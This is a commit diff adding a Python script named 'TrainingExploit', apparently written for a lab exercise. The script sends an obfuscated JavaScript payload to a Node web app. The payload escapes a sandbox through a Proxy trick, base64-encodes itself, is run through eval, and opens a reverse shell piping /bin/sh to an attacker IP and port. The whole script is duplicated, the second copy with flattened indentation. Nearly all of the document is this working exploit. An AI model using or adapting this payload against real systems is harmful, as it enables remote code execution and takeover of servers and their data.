richardcurteis · July 15, 2021 15:45
diff --git a/TrainingExploit b/TrainingExploit
 #!/usr/bin/python3

 import requests
 import base64

 target = f"http://127.0.0.1:3000/"

 cmd = "/bin/sh"

 attackerIp = "127.0.0.1"
 attackerPort = 4444

 # Double {{}} pairs are required to escape single {} in Python formatted strings
 payload = """( function(){{ 
 	try{{
 		Buffer.from(new Proxy({{}}, {{
 			getOwnPropertyDescriptor(){{
 				throw f=>f.constructor("return process")();
 			}}
 		}}));
 	}}catch(e){{
 		let req = e(()=>{{}}).mainModule.require;
        let net = req("net");
 		let sh = req("child_process").exec("{0}");
        let client = new net.Socket(); 
        client.connect({1}, '{2}', function() {{ 
            client.pipe(sh.stdin); sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        }});
 	}}
 }})();""".format(cmd, attackerPort, attackerIp)

 # Encode payload to base64 bytes-like object
 payload = base64.b64encode(payload.encode('ascii'))

 # Decode to plaintext
 payload = payload.decode("ascii")

 # eval() based wrapper for code housing payload
 wrapper = """( function(){{
    let b64Payload = `{0}`;
    let buffer = new Buffer.from(b64Payload, 'base64');
    let shell = buffer.toString();
    eval(shell);    
 }})();""".format(payload)

 # Proxy through burp for debugging
 proxies={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

 # Define POST params and send request
 data = {"transformation": wrapper}
 res = requests.post(target, data=data, proxies=proxies)

 if res.status_code == 200:
    print("[X] Great success. Can haz shellz?")
	#!/usr/bin/python3

	import requests
	import base64

	target = f"http://127.0.0.1:3000/"

	cmd = "/bin/sh"

	attackerIp = "127.0.0.1"
	attackerPort = 4444

	# Double {{}} pairs are required to escape single {} in Python formatted strings
	payload = """( function(){{
	try{{
	Buffer.from(new Proxy({{}}, {{
	getOwnPropertyDescriptor(){{
	throw f=>f.constructor("return process")();
	}}
	}}));
	}}catch(e){{
	let req = e(()=>{{}}).mainModule.require;
	let net = req("net");
	let sh = req("child_process").exec("{0}");
	let client = new net.Socket();
	client.connect({1}, '{2}', function() {{
	client.pipe(sh.stdin); sh.stdout.pipe(client);
	sh.stderr.pipe(client);
	}});
	}}
	}})();""".format(cmd, attackerPort, attackerIp)

	# Encode payload to base64 bytes-like object
	payload = base64.b64encode(payload.encode('ascii'))

	# Decode to plaintext
	payload = payload.decode("ascii")

	# eval() based wrapper for code housing payload
	wrapper = """( function(){{
	let b64Payload = `{0}`;
	let buffer = new Buffer.from(b64Payload, 'base64');
	let shell = buffer.toString();
	eval(shell);
	}})();""".format(payload)

	# Proxy through burp for debugging
	proxies={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

	# Define POST params and send request
	data = {"transformation": wrapper}
	res = requests.post(target, data=data, proxies=proxies)

	if res.status_code == 200:
	print("[X] Great success. Can haz shellz?")